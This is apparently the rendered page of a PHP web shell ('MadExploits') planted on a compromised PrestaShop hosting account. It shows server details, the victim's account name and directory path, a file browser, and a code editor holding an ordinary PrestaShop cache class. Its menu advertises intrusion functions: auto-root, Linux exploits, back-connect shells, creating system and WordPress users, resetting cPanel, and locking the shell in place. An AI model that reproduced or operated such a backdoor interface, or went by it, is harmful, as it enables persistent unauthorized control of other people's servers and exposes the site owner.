Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.61
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
alba-demenagements /
classes /
cache /
[ HOME SHELL ]
Name
Size
Permission
Action
Cache.php
18.52
KB
-rw----r--
CacheApc.php
4.69
KB
-rw----r--
CacheMemcache.php
7.13
KB
-rw----r--
CacheMemcached.php
6.45
KB
-rw----r--
CacheXcache.php
2.27
KB
-rw----r--
index.php
1.34
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CacheApc.php
<?php /** * Copyright since 2007 PrestaShop SA and Contributors * PrestaShop is an International Registered Trademark & Property of PrestaShop SA * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.md. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/OSL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://devdocs.prestashop.com/ for more information. * * @author PrestaShop SA and Contributors <contact@prestashop.com> * @copyright Since 2007 PrestaShop SA and Contributors * @license https://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0) */ /** * This class requires the PECL APC extension or PECL APCu extension to be installed. * * @since 1.5.0 */ class CacheApcCore extends Cache { /** @var bool Whether APCu is enabled */ public $apcu; /** * CacheApcCore constructor. */ public function __construct() { if (!extension_loaded('apc') && !extension_loaded('apcu')) { throw new PrestaShopException('APC cache has been enabled, but the APC or APCu extension is not available'); } $this->apcu = extension_loaded('apcu'); } /** * Delete one or several data from cache (* joker can be used, but avoid it !) * E.g.: delete('*'); delete('my_prefix_*'); delete('my_key_name');. * * @param string $key Cache key * * @return bool Whether the key was deleted */ public function delete($key) { if ($key == '*') { $this->flush(); } elseif (strpos($key, '*') === false) { $this->_delete($key); } else { $pattern = str_replace('\\*', '.*', preg_quote($key)); $cache_info = (($this->apcu) ? apcu_cache_info('') : apc_cache_info('')); foreach ($cache_info['cache_list'] as $entry) { if (isset($entry['key'])) { $key = $entry['key']; } else { $key = $entry['info']; } if (preg_match('#^' . $pattern . '$#', $key)) { $this->_delete($key); } } } return true; } /** * @see Cache::_set() */ protected function _set($key, $value, $ttl = 0) { $result = (($this->apcu) ? apcu_store($key, $value, $ttl) : apc_store($key, $value, $ttl)); if ($result === false) { $this->setAdjustTableCacheSize(true); } return $result; } /** * @see Cache::_get() */ protected function _get($key) { return ($this->apcu) ? apcu_fetch($key) : apc_fetch($key); } /** * @see Cache::_exists() */ protected function _exists($key) { if (!function_exists('apc_exists') && !function_exists('apcu_exists')) { // We're dealing with APC < 3.1.4; use this boolean wrapper as a fallback: return (bool) apc_fetch($key); } else { return ($this->apcu) ? apcu_exists($key) : apc_exists($key); } } /** * @see Cache::_delete() */ protected function _delete($key) { return ($this->apcu) ? apcu_delete($key) : apc_delete($key); } /** * @see Cache::_writeKeys() */ protected function _writeKeys() { } /** * @see Cache::flush() */ public function flush() { return ($this->apcu) ? apcu_clear_cache() : apc_clear_cache(); } /** * Store data in the cache. * * @param string $key Cache Key * @param mixed $value Value * @param int $ttl Time to live in the cache * 0 = unlimited * * @return bool Whether the data was successfully stored */ public function set($key, $value, $ttl = 0) { return $this->_set($key, $value, $ttl); } /** * Retrieve data from the cache. * * @param string $key Cache key * * @return mixed Data */ public function get($key) { return $this->_get($key); } /** * Check if data has been cached. * * @param string $key Cache key * * @return bool Whether the data has been cached */ public function exists($key) { return $this->_exists($key); } }
Close